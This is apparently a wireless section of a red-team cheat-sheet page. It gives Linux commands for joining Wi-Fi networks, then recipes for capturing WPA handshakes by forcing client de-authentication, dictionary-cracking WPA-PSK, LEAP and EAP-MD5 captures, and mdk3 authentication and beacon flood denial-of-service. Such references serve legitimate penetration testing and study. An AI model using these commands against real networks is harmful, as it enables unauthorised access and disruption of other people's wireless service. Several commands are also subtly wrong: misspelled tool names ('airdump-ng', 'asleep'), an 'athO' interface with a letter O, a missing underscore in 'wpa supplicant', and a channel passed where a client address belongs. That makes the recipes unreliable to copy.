Blue Team Guides Red Team Recipe DevSecOps Guides

Wireless

wireless

Frequency chart

Fcc id lookup

https://apps.fcc.gov/oetcf/eas/reports/GenericSearch.cfm

Database of frequencies

http://www.radioreference.com/apps/db/

Source of Kismet

wifi commands in linux

Connected to an insecure network

iwconfig ath0 essid $SSID
ifconfig ath0 up
dhclient ath0

connect to wep

iwconfig ath0 essid $SSID key
ifconfig ath0 up
dhclient ath0

Connect to wpa-psk

iwconfig ath0 essid $SSID
ifconfig ath0 up
wpa_supplicant -B -i ath0 -c wpa-psk.conf
dhclient ath0

Connect to wpa-enterprise

iwconfig ath0 essid $SSID
ifconfig ath0 up
wpa supplicant -B -i ath0 -c wpa-ent.conf
dhclient ath0

Bluetooth on Linux

Testing wifi networks in Linux

Start monitor mode interface

airmon-ng stop ath0
airmon-ng start wifi0
iwconfig ath0 channel $CH

Capture client handshake attack

airdump-ng -c $CH --bssid $AP -w file athO #Capture traffic
aireplay-ng -0 10 -a $AP -c $CH athO #Force client de-auth

Brute force handshake attack

aircrack-ng -w wordlist capture.cap # WPA-PSK
asleep -r capture.cap -w dict.asleep # LEAP
eapmd5pass -r capture.cap -w wordlist # EAP-HDS

Dos attack

mdk3 int a -a $AP #Auth Flood
mdk3 int b -c $CH #Beacon Flood
PreviousProgrammingNextReverse

Last updated